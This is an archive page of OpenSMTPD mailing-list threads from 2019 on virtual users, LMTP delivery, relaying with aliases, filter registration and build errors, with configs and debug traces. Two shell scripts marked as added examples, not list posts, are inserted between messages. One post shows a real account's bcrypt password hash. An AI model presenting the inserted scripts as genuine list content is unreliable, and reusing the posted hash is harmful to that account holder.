> > backed by one single user, you needed to have a passwd(5)-format file for 
> > Dovecot and
> > share that with OpenSMTPD.
> > 
> > But then I did a fully virtual setup for myself and I didn't use 
> > table-passwd, so the
> > rationale behind it falls a bit apart for me, unless there's other 
> > use-cases.
> > 
> > On my setup, file /etc/mail/accounts is a simple two columns 
> > username/password table:
> > 
> > # head -1 /etc/mail/accounts.txt 
> > gil...@poolp.org:$2b$09$0ek9ozmo1u0mSsiRo/z2AumROLK.70T9A6bP3mFDqb38L0sC5RvT6
> > #
> > 
> [...]
> > 
> > This allows both OpenSMTPD and Dovecot to authenticate accounts that are 
> > not system
> > users, allows OpenSMTPD to drop mail to a maildir owned by system account 
> > in charge
> > of virtual accounts and allows Dovecot to properly serve these accounts.
> > 
> > Am I missing your use-cases here ?
> > 
>
> Yes, this is perfectly fine for simpler cases, but as someone else 
> mentioned in this thread earlier already:
> Dovecot passdb knows about additional fields, in particular 
> to specify user specific quotas (usually rather important in 
> virtual user setups). table-passwd can handle/ignore these 
> extra_fields correctly. So my passwd file lines looks like this:
> f...@bar.de:$2b$::userdb_quota_rule=*:storage=10G
>
>
>

I'm guessing you are looking for fat to trim. Personally I like it as is. Just 
my two cents.

Edgar

Re: table-passwd

2019-09-17 Thread Edgar Pettijohn

On Sep 17, 2019 9:05 AM, Gilles Chehade  wrote:
>
> Hello,
>
> Is there anyone using table-passwd for _any_ other purposes than sharing
> with Dovecot ?
>
> I have built a fully virtual setup which shares credentials with Dovecot
> and since I managed to do it _without_ table-passwd I'm wondering if the
> table backend is really useful and if it was not created because someone
> had overlooked the first few lines of the Dovecot documentation stating:
>
> "For a password database, it's enough to have only the user and password
> fields."
>
> -- 
> Gilles Chehade    @poolpOrg
>
> https://www.poolp.org    patreon: https://www.patreon.com/gilles
>

Not actually using it, but for dovecot to use it as a userdb as well as a 
passdb it needs the additional fields.

Edgar

Re: smarthost + aliases

2019-09-13 Thread Edgar Pettijohn
On Sat, Sep 14, 2019 at 12:32:22AM +0200, Thomas Schweikle wrote:
> Hi!
> 
> Trying to set up opensmtpd as a simple single mta relaying all mail to a
> smarthost. But ...
> 
> Config:
> listen on localhost
> table aliases db:/etc/aliases.db
> table secrets db:/etc/smtpd.secrets.db
> expire 4h


Add:

accept for local alias  deliver to mbox
accept from local for any relay via smtps+auth://gm...@smtp.gmail.com:465 auth



> 
> aliases hold:
> root: @gmail.com
> 
> now: aliases are not used. If I change
> accept from local for any relay via smtps+auth://gm...@smtp.gmail.com:465 auth
> 
> 
> to
> 
> accept from local for any alias  relay via smtps+auth://
> gm...@smtp.gmail.com:465 auth 
> 
> "smtpd -n" exhausts:
> /etc/smtpd.conf:18: aliases/virtual may not be used with a relay rule
> warn: no rules, nothing to do
> 
> what i want is:
> - accept mail from local,
> - apply alias expansion so "root" -> "??@ maildomain"
> - relay the whole thing.
> 
> at the smarthost this shall look like:
> From: root??@ servername
> To: ??@ maildomain
> 
> any idea how to make it happen with opensmtpd?
> There are lots of examples to find within the www, but none with relaying. All
> with local delivery. But I like to relay and expand aliases before!
> 
> --
> Thomas



Re: My smtp server can't send emails to another ones (550 Invalid recipient)

2019-09-13 Thread Edgar Pettijohn
On Fri, Sep 13, 2019 at 08:04:12PM -0300, marcio_silva wrote:
> Hi all,
> 
> I am using Hyperbola distro with the following packages:
> 
> * opensmtpd 6.4.2p1
> * dkimproxy 1.4.1
> 
> I have installed a mail server to send and receive emails with my own domain
> with the following configurations:
> 
> * "smtp.libreware.info" as server
> * "libreware.info" as email address
> * "dusseldorf.libreware.info" as PTR in IPv4
> * "smtp.libreware.info" as PTR in IPv6
> 
> Features that works well:
> 
> * Accessing to port 587 SMTP+TLS
> * Receiving from itself and from another smtp servers around internet (eg.
> riseup.net emails)
> * Sending emails to itself and another @libreware.info users
> 
> Issues:
> 
> * Port 25 to send emails has not been tested
> * Localhost network has not been tested
> * Accessing to port 465 (SMTPS) is not working
> * Sending email to another smtp servers (eg. f...@libreware.info ->
> b...@example.com) is not working by generating 550 error (550 Invalid
> recipient)
> 
> 
> 
> smtpd.conf:
> 
> ## This is the smtpd server system-wide configuration file.
> ## See smtpd.conf(5), aliases(5) and table(5) for more information.
> 
> ca smtp.libreware.info cert
> '/etc/letsencrypt/archive/libreware.info/chain1.pem'
> 
> bounce warn-interval  '4h'
> 
> mta max-deferred  100
> 
> pki smtp.libreware.info cert
> '/etc/letsencrypt/archive/libreware.info/fullchain1.pem'
> pki smtp.libreware.info dhe   auto
> pki smtp.libreware.info key
> '/etc/letsencrypt/archive/libreware.info/privkey1.pem'
> 
> queue compression
> queue ttl '4d'
> 
> smtp ciphers  
> 'HIGH:AES128:!aNULL:!kDH:!kPSK:!NULL:!kRSA:!kRSAPSK:SHA:SHA256:SHA384:!TLSv1'
> smtp max-message-size '35M'
> smtp sub-addr-delim   '+'
> 
> table aliases '/etc/smtpd/tables.d/aliases.conf'
> table credentials '/etc/smtpd/tables.d/credentials.conf'
> table domains '/etc/smtpd/tables.d/domains.conf'
> table hostnames_inet  '/etc/smtpd/tables.d/hostnames.conf'
> table virtuals'/etc/smtpd/tables.d/virtuals.conf'
> 
> 
> 
> action deliver_to_inetmaildir 
> '/var/mail/%{user.username}/inbox'  \
>   alias   
> action deliver_to_local   maildir 
> '/var/mail/%{user.username}/inbox'  \
>   virtual 
> action relay_to_inet_smtp relay
>   helo-src
> action relay_to_inet_subm relay   
> \
>   helo-src
> \
>   host
> smtp+tls://la...@smtp.libreware.info:25 \
>   auth
> action relay_to_inet_submsrelay   
> \
>   helo-src
> \
>   host
> smtp+tls://la...@smtp.libreware.info:25 \
>   auth
> action relay_to_local relay
> 
> listen on lo  port   24   \
>   tag lmtp_local
> listen on eth0auth-optional  
> \
>   ca  smtp.libreware.info \
>   hostnames   \
>   mask-src\
>   pki smtp.libreware.info \
>   port   25   \
>   tag smtp_server_starttls\
>   tls-require
> listen on eth0auth   
> \
>   ca  smtp.libreware.info \
>   hostnames   \
>   mask-src\
>   pki smtp.libreware.info \
>   port  465   \
>   smtps   \
>   tag smtps_submission
> listen on eth0auth   
> \
>   ca  smtp.libreware.info \
>   hostnames   \
>   mask-src\
>   pki smtp.libreware.info \
>   port  587   \
>   tag smtp_submission_starttls\
>   

Re: Virtual User handling

2019-09-07 Thread Edgar Pettijohn
On Sat, Sep 07, 2019 at 11:53:58AM +0200, Ede Wolf wrote:
> > > So it is a binary, thats useful information. Having specified /opt/smtpd
> > > as prefix during ./configure, it is located here:
> > > 
> > > /opt/smptd/libexec/opensmtpd/mail.lmtp
> > > 
> > 
> > Throw it in /usr/local/libexec/smtpd/ and see what happens. May be a build 
> > tools bug.
> > 
> 
> Excellent idea, however, the error stays the same. No change, despite
> copying the whole opensmtpd folder to /usr/local/libexec
> 
> 
> Even strace does not reveal the path it is looking for:
> 
> 
> expand: 0x56284c3f4338: expand_insert() called for
> address:m...@example.com[parent=(nil), rule=(nil)]
> expand: 0x56284c3f4338: inserted node 0x56284c3f6030
> expand: lka_expand: address: m...@example.com [depth=0]
> lookup: match "37.120.186.114" as NETADDR in table static: -> true
> lookup: match "example.com" as DOMAIN in table static: -> true
> rule #1 matched: match from any for domain  action deliver
> lookup: lookup "m...@example.com" as ALIAS in table static:vusers -> none
> lookup: lookup "mary" as ALIAS in table static:vusers -> none
> lookup: lookup "@example.com" as ALIAS in table static:vusers -> none
> lookup: lookup "@" as ALIAS in table static:vusers -> "lmtpd"
> expand: 0x56284c3f3b10: expand_insert() called for
> username:lmtpd[parent=(nil), rule=(nil)]
> expand: 0x56284c3f3b10: inserted node 0x56284c3f6590
> expand: 0x56284c3f4338: expand_insert() called for
> username:lmtpd[parent=0x56284c3f6030, rule=0x56284c403e50,
> dispatcher=0x56284c405750]
> expand: 0x56284c3f4338: inserted node 0x56284c3f6af0
> expand: 0x56284c3f3b10: clearing expand tree
> expand: 0x56284c3f3b10: freeing expand tree
> debug: aliases_virtual_get: '@example.com' resolved to 1 nodes
> expand: lka_expand: username: lmtpd [depth=1, sameuser=0]
> lookup: lookup "lmtpd@" as ALIAS in table static:vusers -> none
> lookup: lookup "lmtpd" as ALIAS in table static:vusers -> none
> lookup: lookup "@" as ALIAS in table static:vusers -> "lmtpd"
> expand: 0x56284c3ed110: expand_insert() called for
> username:lmtpd[parent=(nil), rule=(nil)]
> expand: 0x56284c3ed110: inserted node 0x56284c3f6590
> expand: 0x56284c3f4338: expand_insert() called for
> username:lmtpd[parent=0x56284c3f6af0, rule=0x56284c403e50,
> dispatcher=0x56284c405750]
> expand: 0x56284c3f4338: setting sameuser = 1
> expand: 0x56284c3f4338: inserted node 0x56284c3f7050
> expand: 0x56284c3ed110: clearing expand tree
> expand: 0x56284c3ed110: freeing expand tree
> debug: aliases_virtual_get: '@' resolved to 1 nodes
> expand: lka_expand: username: lmtpd [depth=2, sameuser=1]
> lookup: lookup "lmtpd" as USERINFO in table getpwnam: ->
> "115:115:/opt/smptd/var/lmtpd"
> [{EPOLLIN, {u32=6, u64=6}}], 32, -1) = 1
> epoll_ctl(3, EPOLL_CTL_DEL, 6, 0x7ffeb16e607c) = 0
> socket(AF_INET, SOCK_DGRAM, IPPROTO_IP) = 12
> socket(AF_INET, SOCK_DGRAM, IPPROTO_IP) = 13
> close(12)   = 0
> close(13)   = 0
> recvmsg(6, {msg_name=NULL, msg_namelen=0, 
> msg_iov=[{iov_base="4\0\0\0(\21\0\0\0\0\0\0\237\25\0\0[\300\213\3725\333\374!\0lmtpd\0\0"...,
> iov_len=65535}], msg_iovlen=1, msg_controllen=0, msg_flags=0}, 0) = 4392
> stat("/opt/smptd/var/lmtpd", {st_mode=S_IFDIR
> openat(AT_FDCWD, "/opt/smptd/var/lmtpd/.forward", O_RDONLY
> epoll_ctl(3, EPOLL_CTL_ADD, 6, {EPOLLIN
> epoll_ctl(3, EPOLL_CTL_DEL, 6, 0x7ffeb16e5fdc) = 0
> epoll_ctl(3, EPOLL_CTL_ADD, 6, {EPOLLIN
> epoll_wait(3, [{EPOLLOUT, {u32=6, u64=6}}], 32, -1) = 1
> epoll_ctl(3, EPOLL_CTL_DEL, 6, 0x7ffeb16e607c) = 0
> sendmsg(6, {msg_name=NULL, msg_namelen=0, 
> msg_iov=[{iov_base="4\0\0\0(\21\0\0\0\0\0\0\234\25\0\0[\300\213\3725\333\374!\1lmtpd\0\0"...,
> iov_len=4392}], msg_iovlen=1, msg_controllen=0, msg_flags=0}, 0) = 4392
> epoll_ctl(3, EPOLL_CTL_ADD, 6, {EPOLLIN, {u32=6, u64=6}}expand: no forward
> for user lmtpd, just deliver
> ) = 0
> epoll_wait(3, expand: 0x56284c3f4338: clearing expand tree
> smtp: 0x564267537b60: fd 14 from queue
> smtp: 0x564267537b60: message fd 14
> smtp: 0x564267537b60: message begin
> debug: 0x564267537b60: end of message, error=0
> 21fcdb35fa8bc05b smtp message msgid=22c2f515 size=245 nrcpt=1 proto=ESMTP
> 21fcdb35fa8bc05b smtp envelope evpid=22c2f5151c4decec
> from= to=
> debug: scheduler: evp:22c2f5151c4decec scheduled (mda)
> mda: new user 21fcdb36b331cade for ":lmtpd" delivering as "lmtpd"
> debug: lka: userinfo :lmtpd
> lookup: lookup "lmtpd" as USERINFO in table getpwnam: ->
> "115:115:/opt/smptd/var/lmtpd"
> debug: mda: new session 21fcdb37f01f7374 for user ":lmtpd" evpid
> 22c2f5151c4decec
> debug: mda: no more envelope for ":lmtpd"
> debug: mda: got message fd 14 for session 21fcdb37f01f7374 evpid
> 22c2f5151c4decec
> debug: mda: querying mda fd for session 21fcdb37f01f7374 evpid
> 22c2f5151c4decec
> [{EPOLLIN, {u32=7, u64=7}}], 32, -1) = 1
> epoll_ctl(3, EPOLL_CTL_DEL, 7, 0x7ffeb16e607c) = 0
> socket(AF_INET, SOCK_DGRAM, IPPROTO_IP) = 12
> socket(AF_INET, SOCK_DGRAM, IPPROTO_IP) = 

Re: Virtual User handling

2019-09-06 Thread Edgar Pettijohn

On Sep 6, 2019 12:40 PM, Ede Wolf  wrote:
>
> Am 06.09.19 um 18:59 schrieb Edgar Pettijohn:
> > Sounds like the mail.lmtp program is missing or not where it belongs. 
> > Should live somewhere in /usr/local/libexec. Find it and let us know where 
> > it is and somebody can probably tell you where it needs to be. Or it just 
> > didn't get built for some reason.
>
> So it is a binary, that's useful information. Having specified /opt/smtpd 
> as prefix during ./configure, it is located here:
>
> /opt/smptd/libexec/opensmtpd/mail.lmtp
>

Throw it in /usr/local/libexec/smtpd/ and see what happens. May be a build 
tools bug.

> Since libexec is usually not in path anyway, I wonder, how to make smtpd 
> recognize it, if --prefix is not honored?
>
>
> > Your copy is apparently different from mine.
>
>
> Nope. I've cited smtpd.conf (from the opensmtpd homepage), you have 
> looked into tables. Since userbase is the only location I've come along 
> that uses the userinfo table, I've gone with the attribute, not the 
> argument.
>

Agreed. Must be a bug in the documentation or the daemon. My bet is the manual 
is wrong.

Edgar
> Thanks again for helping out!
>
> Ede
>


Re: Virtual User handling

2019-09-06 Thread Edgar Pettijohn

On Sep 6, 2019 10:46 AM, Ede Wolf  wrote:
>
>
> > Maybe run 'smtpd -dv -T expand -T lookup -T rules' and see how OpenSMTPD 
> > is translating the aliases and which rules it's matching etc.
>
> This is a really helpful command. Maybe using that I can be a bit more 
> precise in defining my confusion.
>
> My simple setup, git pulled and built yesterday:
>
>
> action "deliver" lmtp "/run/cyrus/socket/lmtp" rcpt-to user lmtpd
> match from any for domain "example.com" rcpt-to  action deliver
>
>
> With "musers" only containing good ole b...@example.com and "lmtpd" being 
> a regular system user. Bob is not known to the system. And shall not.
>
> Now, the man page reads:
>
> user username
> Specify the username for performing the delivery, to be looked up with 
> getpwnam(3).
>
> and:
>
> userbase 
> Use the mapping table for user lookups instead of the getpwnam(3) function.
> ->The userbase does not apply for the user option.<-
>

Your copy is apparently different from mine.

Userinfo tables

User info tables are used in rule context to specify an alternate user base, 
mapping virtual users to local system users by UID, GID and home directory.

action name method userbase 

A userinfo table looks as follows:

joe     1000:100:/home/virtual/joe
jack    1000:100:/home/virtual/jack

In this example, both joe and jack are virtual users mapped to the local system 
user with UID 1000 and GID 100, but different home directories. These 
directories may contain a forward(5) file. This can be used in conjunction with 
an alias table that maps an email address or the domain part to the desired 
virtual username. For example:

j...@example.org joe
j...@example.com jack

It has to map to a system user.
If you want it to be lmtpd just replace the 1000:100 above with lmtpd's uid:gid

> So my "user" attribute is lmtpd, a regular system user. But:
>
> af0267593be5b0a1 smtp connected address=
> expand: 0x5598b9f68328: expand_insert() called for 
> address:b...@example.com[parent=(nil), rule=(nil)]
> expand: 0x5598b9f68328: inserted node 0x5598b9f6a020
> expand: lka_expand: address: b...@example.com [depth=0]
> lookup: match "1.2.3.4" as NETADDR in table static: -> true
> lookup: match "example.com" as DOMAIN in table static: -> true
> lookup: match "b...@example.com" as MAILADDR in table static:musers -> true
> rule #1 matched: match from any for domain  rcpt-to musers 
> action deliver
> expand: 0x5598b9f68328: expand_insert() called for 
> username:bob[parent=0x5598b9f6a020, rule=0x5598b9f77e30, 
> dispatcher=0x5598b9f79750]
> expand: 0x5598b9f68328: inserted node 0x5598b9f6a580
>
> expand: lka_expand: username: bob [depth=1, sameuser=0]
> lookup: lookup "bob" as USERINFO in table getpwnam: -> none
> expand: lka_expand: user-part does not match system user
> expand: 0x5598b9f68328: clearing expand tree
> af0267593be5b0a1 smtp failed-command command="RCPT TO:" 
> result="550 Invalid recipient: "
>
> The problem is obviously: "lookup "bob" as USERINFO in table 
> getpwnam: -> none"
>
>
>
> Now the local delivery should be done with the user lmtpd, why is user 
> "bob" then looked up at all via USERINFO getpwnam, instead of lmtpd, 
> when userinfo shall not be used with the "user" attribute.
>
> Whether "userbase" is invoked via getpwnam or a USERINFO table, should 
> make no difference? It should not be used, when the "user" attribute is 
> being used?
>
> Automagically I should add, I have not defined the userbase parameter 
> anywhere in my config.
>
> Hopefully I've been able to narrow down my lack of comprehension. There 
> is something in the manpage I get wrong.
>
> Thanks
>
> Ede
>
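
The lookups in the traces in this thread, as an added example that is not code from the thread or from OpenSMTPD: a simplified shell model of how a recipient is tried against a virtual table (full address, user part, "@domain", then "@") and why a resulting username with no userbase entry ends in "550 Invalid recipient". The function names, file-backed tables and addresses are constructed assumptions; the real daemon also expands aliases recursively and falls back to getpwnam(3) when no userbase is configured.

```shell
#!/bin/sh
# Simplified model (added example) of the lookups shown by "smtpd -T lookup".
# Tables are plain files: "key<whitespace>value", one entry per line.

# table_get FILE KEY -> prints the value stored for KEY, returns 1 if absent
table_get() {
    awk -v k="$2" '
        $1 == k { $1 = ""; sub(/^[ \t]+/, ""); print; found = 1; exit }
        END     { exit !found }' "$1"
}

# virtual_lookup VUSERS RCPT -> prints the username the recipient maps to.
# Key order follows the trace: full address, user part, @domain, "@".
virtual_lookup() {
    vtable=$1
    rcpt=$2
    user=${rcpt%@*}
    domain=${rcpt#*@}
    for key in "$rcpt" "$user" "@$domain" "@"; do
        if table_get "$vtable" "$key"; then
            return 0
        fi
    done
    return 1
}

# resolve_rcpt VUSERS USERINFO RCPT -> "user uid:gid:home", or a 550-style
# line when either the virtual entry or the userbase entry is missing.
resolve_rcpt() {
    if ! u=$(virtual_lookup "$1" "$3"); then
        echo "550 Invalid recipient: no virtual entry for $3"
        return 1
    fi
    if ! info=$(table_get "$2" "$u"); then
        echo "550 Invalid recipient: $u not in userbase"
        return 1
    fi
    echo "$u $info"
}

# Constructed sample tables (not taken from anyone's server).
demo_dir=$(mktemp -d)
trap 'rm -rf "$demo_dir"' EXIT
cat > "$demo_dir/vusers" <<'EOF'
bob@example.com   bob
@example.com      vmail
EOF
cat > "$demo_dir/userinfo" <<'EOF'
bob     5000:5000:/var/vmail/bob
EOF

# bob has both entries; mary falls through to the catch-all "vmail",
# which has no userbase entry and is therefore rejected.
resolve_rcpt "$demo_dir/vusers" "$demo_dir/userinfo" bob@example.com
resolve_rcpt "$demo_dir/vusers" "$demo_dir/userinfo" mary@example.com || true
```

Adding a `vmail` line to the userinfo file makes the catch-all recipient resolve, which is the same fix as pointing the table value at a user that getpwnam(3) or the userbase can find.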


Re: OpenSMTPD-Logwatch script.

2019-09-05 Thread Edgar Pettijohn
Look for poolporg on GitHub. He has a filter-eventlog that you can look at for 
inspiration.

Edgar
On Sep 5, 2019 5:37 AM, Reio Remma  wrote:
>
> On 05/09/2019 13:32, Martijn van Duren wrote:
> > On 9/5/19 11:55 AM, Reio Remma wrote:
> >> On 05/09/2019 11:33, gil...@poolp.org wrote:
> >>> Yes, see the smtpd.conf(5) man page:
> >>>
> >>> filter myreporter proc-exec "/tmp/reporting.sh"
> >>>
> >>> listen on [...] filter myreporter
> >> mproc: pony -> lka : 291 IMSG_SMTP_EXPAND_RCPT
> >>
> >> SMTPD seems to get stuck here with no errors. This is with the simple:
> >>
> >> filter reporter proc-exec "/etc/opensmtpd/reporter.sh"
> >>
> >> #!/bin/sh
> >> while read line; do
> >>      echo $line >> /var/log/opensmtpd.log
> >> done
> >>
> >> Reio
> >>
> > You need to register what events you want to receive and finish up with
> > register
> >
> > $ cat test.sh
> > #!/bin/sh
> >
> > while read line; do
> >  echo $line >&2
> >  if [ "${line%%\
> >  if [ "${line#*\
> >  echo "register
> >  echo "register
> >  fi
> >  continue
> >  fi
> > done
> >
> > Possible values for report are (from lka_report.c):
> > static struct smtp_events {
> >  const char *event;
> > } smtp_events[] = {
> >  { "link-connect" },
> >  { "link-disconnect" },
> >  { "link-greeting" },
> >  { "link-identify" },
> >  { "link-tls" },
> >  { "link-auth" },
> >
> >  { "tx-reset" },
> >  { "tx-begin" },
> >  { "tx-mail" },
> >  { "tx-rcpt" },
> >  { "tx-envelope" },
> >  { "tx-data" },
> >  { "tx-commit" },
> >  { "tx-rollback" },
> >
> >  { "protocol-client" },
> >  { "protocol-server" },
> >
> >  { "filter-response" },
> >
> >  { "timeout" },
> > };
> >
> > Possible values for filter are:
> > static struct filter_exec {
> >  enum filter_phase   phase;
> >  const char *phase_name;
> >  int    (*func)(struct filter_session *, struct 
> >filter *, uint64_t, const char *);
> > } filter_execs[FILTER_PHASES_COUNT] = {
> >  { FILTER_CONNECT,   "connect",  filter_builtins_connect },
> >  { FILTER_HELO,  "helo", filter_builtins_helo },
> >  { FILTER_EHLO,  "ehlo", filter_builtins_helo },
> >  { FILTER_STARTTLS,  "starttls", filter_builtins_notimpl },
> >  { FILTER_AUTH,  "auth", filter_builtins_notimpl },
> >  { FILTER_MAIL_FROM, "mail-from",    filter_builtins_mail_from 
> >},
> >  { FILTER_RCPT_TO,   "rcpt-to",  filter_builtins_rcpt_to },
> >  { FILTER_DATA,  "data", filter_builtins_notimpl },
> >  { FILTER_DATA_LINE, "data-line",    filter_builtins_notimpl },
> >  { FILTER_RSET,  "rset", filter_builtins_notimpl },
> >  { FILTER_QUIT,  "quit", filter_builtins_notimpl },
> >  { FILTER_NOOP,  "noop", filter_builtins_notimpl },
> >  { FILTER_HELP,  "help", filter_builtins_notimpl },
> >  { FILTER_WIZ,   "wiz",  filter_builtins_notimpl },
> >  { FILTER_COMMIT,    "commit",   filter_builtins_notimpl },
> > };
> >
> > reports come in in the format:
> > report
> >
> > filters come in in the format:
> > filter
> >
> > Note that filters require a proceed, rewrite, reject, or disconnect
> > reply in the form:
> >
> > filter-result
> > filter-result
> > filter-result
> > filter-result
> >
> > Note that this is mostly stable, but some changes may occur, so
> > keep track of the version. Minor versions are backwards compatible,
> > major versions are not.
> >
>
> Thanks! I'll keep digging. :)
>
> Reio
>
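
The registration step discussed above, as an added example that is not the script from this thread or from the OpenSMTPD project: a proc-exec reporter that answers the configuration phase, subscribes to report events, and logs them with non-printable bytes removed, since fields such as the HELO name come from the remote peer. It assumes the pipe-separated line protocol described in smtpd-filters(7) ("config|ready", "register|report|smtp-in|<event>", "register|ready"); the log path, function names and sample session are constructed.

```shell
#!/bin/sh
# Added example: reporter for 'filter NAME proc-exec "/path/to/this.sh"'.
# Assumed protocol (smtpd-filters(7)): smtpd sends "config|..." lines ending
# with "config|ready", then waits for registrations closed by "register|ready".

LOGFILE=${LOGFILE:-/var/log/opensmtpd-events.log}   # assumed location

# sanitize STRING: drop non-printable bytes so peer-supplied fields cannot
# place terminal escape sequences or control characters in the log.
sanitize() {
    printf '%s' "$1" | LC_ALL=C tr -cd '[:print:]'
}

# format_report LINE
# "report|version|time|subsystem|event|session|params..."
#   -> "time session event params..."
format_report() {
    { sanitize "$1"; echo; } | awk -F'|' '{
        out = $3 " " $6 " " $5
        for (i = 7; i <= NF; i++) out = out " " $i
        print out
    }'
}

# run_reporter EVENT...: protocol loop, stdin from smtpd, stdout to smtpd.
run_reporter() {
    while IFS= read -r line; do
        case $line in
        'config|ready')
            # Without this block smtpd keeps waiting and sessions stall.
            for ev in "$@"; do
                printf 'register|report|smtp-in|%s\n' "$ev"
            done
            printf 'register|ready\n'
            ;;
        'report|'*)
            # Quoted printf-style handling: no word splitting or globbing
            # of the line, unlike an unquoted "echo $line".
            format_report "$line" >> "$LOGFILE"
            ;;
        esac
    done
}

# Constructed session (sample input, not a capture). Under smtpd the script
# would instead end with: run_reporter link-connect link-identify tx-rcpt
demo() {
    LOGFILE=$(mktemp)
    printf '%s\n' \
        'config|subsystem|smtp-in' \
        'config|ready' \
        'report|0.4|1567684800.000001|smtp-in|link-connect|1a2b3c4d5e6f7081|localhost|pass|127.0.0.1:3333|127.0.0.1:25' \
        | run_reporter link-connect tx-rcpt
    cat "$LOGFILE"
    rm -f "$LOGFILE"
}
demo
```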


Re: OpenSMTPD-Logwatch script.

2019-09-03 Thread Edgar Pettijohn
On Tue, Sep 03, 2019 at 09:29:14PM +0300, Reio Remma wrote:
> On 27.04.2018 12:26, Reio Remma wrote:
> > Hello all,
> > 
> > I've whipped together a Logwatch script for OpenSMTPD. If anyone is
> > interested in giving it a try, it's now at:
> > 
> > https://github.com/whataboutpereira/OpenSMTPD-Logwatch
> 
> Hello! I've now updated the Logwatch script to work with OpenSMTPD 6.6.0
> (current portable).
> 
> Good luck,
> Reio
>

Lots of errors with newer perls. :(

deathstar$ perl -v

This is perl 5, version 28, subversion 2 (v5.28.2) built for amd64-openbsd

Copyright 1987-2019, Larry Wall

Perl may be copied only under the terms of either the Artistic License or the
GNU General Public License, which may be found in the Perl 5 source kit.

Complete documentation for Perl, including FAQ lists, should be found on
this system using "man perl" or "perldoc perl".  If you have access to the
Internet, point your browser at http://www.perl.org/, the Perl Home Page.

deathstar$ ./opensmtpd.pl   
 
Experimental keys on scalar is now forbidden at ./opensmtpd.pl line 523.
Type of arg 1 to keys must be hash or array (not hash element) at 
./opensmtpd.pl line 523, near "} ) "
Experimental keys on scalar is now forbidden at ./opensmtpd.pl line 527.
Type of arg 1 to keys must be hash or array (not hash element) at 
./opensmtpd.pl line 527, near "};"
Experimental keys on scalar is now forbidden at ./opensmtpd.pl line 541.
Type of arg 1 to keys must be hash or array (not hash element) at 
./opensmtpd.pl line 541, near "} )"
Experimental keys on scalar is now forbidden at ./opensmtpd.pl line 553.
Type of arg 1 to keys must be hash or array (not hash element) at 
./opensmtpd.pl line 553, near "} ) "
Experimental keys on scalar is now forbidden at ./opensmtpd.pl line 557.
Type of arg 1 to keys must be hash or array (not hash element) at 
./opensmtpd.pl line 557, near "};"
./opensmtpd.pl has too many errors 



Re: Virtual User handling

2019-09-02 Thread Edgar Pettijohn

On Sep 2, 2019 3:18 AM, Reio Remma  wrote:
>
> On 02/09/2019 10:35, Ede Wolf wrote:
> > Hello Edgar,
> >
> > thanks very much for your in depth reply and the effort you've put 
> > into it.
> >
> > As for the "user" keyword, the way I understand this, is that it 
> > equals the "as" statement in the old version.
> >
> > ... lmtp "/run/cyrus/lmtp" rcpt-to ->as nobody<-
>
> I'm using multiple virtual domains myself and delivering to Dovecot via 
> LMTP with no user parameter. I _suspect_ it's more useful when you let 
> OpenSMTPD deliver straight to mailboxes.
>
> > Back to your reply: That catchall from your example in "@ catchall" is 
> > not a keyword, is it? But a local user account?
>
> @example.com needs to be aliased to a real mail account to receive all these.
>
> > > but some real user has to own the mailbox...
> >

When smtpd goes looking for a .forward file it gets mad if there isn't a 
mailbox to look in. :)

> > Care to explain, why is that? From my unknowledgable point of view, 
> > the mailbox handling should be done on the other side of the lmtpd 
> > socket. This misconception is at the very heart of my question.
>
> Maybe run 'smtpd -dv -T expand -T lookup -T rules' and see how OpenSMTPD 
> is translating the aliases and which rules it's matching etc.
>
> Good luck,
> Reio
>
>


Re: Building 6.4.2p1 without ssl?

2019-09-02 Thread Edgar Pettijohn
Look through the archives. There was someone recently building on Debian with a 
similar issue. 
On Sep 2, 2019 2:48 AM, Ede Wolf  wrote:
>
> Hello,
>
> trying to compile opensmtp it fails with openssl errors, so I've tried 
> to specify --without-libssl at configure time, as at least for testing 
> and learning the basics it is not really that important, but it does not 
> seem to get honored.
>
> Any idea, what I may have to change?
>
> Thanks
>
> Ede
>
>
>
> In case anybody has an idea for building with openssl, here are the 
> final words of the compiler:
>
>
> # gcc --version
> gcc (Gentoo 8.3.0-r1 p1.1) 8.3.0
>
> # openssl version
> OpenSSL 1.1.1c  28 May 2019
>
>
>
> ..
>
> gcc -DHAVE_CONFIG_H -I. -I..  -I../smtpd -I../openbsd-compat 
> -I../openbsd-compat/err_h -I/usr/include   -mtune=skylake -march=skylake 
> -fomit-frame-pointer -O2 -pipe  -fPIC -DPIC -Wall -Wpointer-arith 
> -Wuninitialized -Wsign-compare -Wformat-security 
> -Wsizeof-pointer-memaccess -Wno-pointer-sign -Wno-unused-result 
> -fno-strict-aliasing -fno-builtin-memset -fPIE -D_BSD_SOURCE 
> -D_DEFAULT_SOURCE  -c -o fmt_scaled.o fmt_scaled.c
> fmt_scaled.c: In function 'fmt_scaled':
> fmt_scaled.c:243:52: warning: '%1lld' directive output may be truncated 
> writing between 1 and 17 bytes into a region of size between 0 and 5 
> [-Wformat-truncation=]
>     (void)snprintf(result, FMT_SCALED_STRSIZE, "%lld.%1lld%c",
>  ^
> fmt_scaled.c:243:46: note: directive argument in the range 
> [-9007199254740991, 9007199254740991]
>     (void)snprintf(result, FMT_SCALED_STRSIZE, "%lld.%1lld%c",
>    ^~
> In file included from /usr/include/stdio.h:867,
>   from openbsd-compat.h:189,
>   from includes.h:67,
>   from fmt_scaled.c:41:
> /usr/include/bits/stdio2.h:67:10: note: '__builtin___snprintf_chk' 
> output between 5 and 40 bytes into a destination of size 7
>     return __builtin___snprintf_chk (__s, __n, __USE_FORTIFY_LEVEL - 1,
>    ^~~~
>  __bos (__s), __fmt, __va_arg_pack ());
>  ~
> gcc -DHAVE_CONFIG_H -I. -I..  -I../smtpd -I../openbsd-compat 
> -I../openbsd-compat/err_h -I/usr/include   -mtune=skylake -march=skylake 
> -fomit-frame-pointer -O2 -pipe  -fPIC -DPIC -Wall -Wpointer-arith 
> -Wuninitialized -Wsign-compare -Wformat-security 
> -Wsizeof-pointer-memaccess -Wno-pointer-sign -Wno-unused-result 
> -fno-strict-aliasing -fno-builtin-memset -fPIE -D_BSD_SOURCE 
> -D_DEFAULT_SOURCE  -c -o fparseln.o fparseln.c
> rm -f libopenbsd-compat.a
> /usr/bin/ar cru libopenbsd-compat.a base64.o bsd-getpeereid.o bsd-misc.o 
> bsd-waitpid.o entropy.o event_asr_run.o fgetln.o freezero.o getopt.o 
> imsg.o imsg-buffer.o pidfile.o pw_dup.o reallocarray.o recallocarray.o 
> setproctitle.o setresguid.o strlcat.o strlcpy.o strmode.o strtonum.o 
> strsep.o vis.o xmalloc.o  crypt_checkpass.o  bsd-closefrom.o   bsd-err.o 
> errc.o  fmt_scaled.o  fparseln.o
> ranlib libopenbsd-compat.a
> make[2]: Leaving directory '/root/build/opensmtpd-6.4.2p1/openbsd-compat'
> Making all in mk
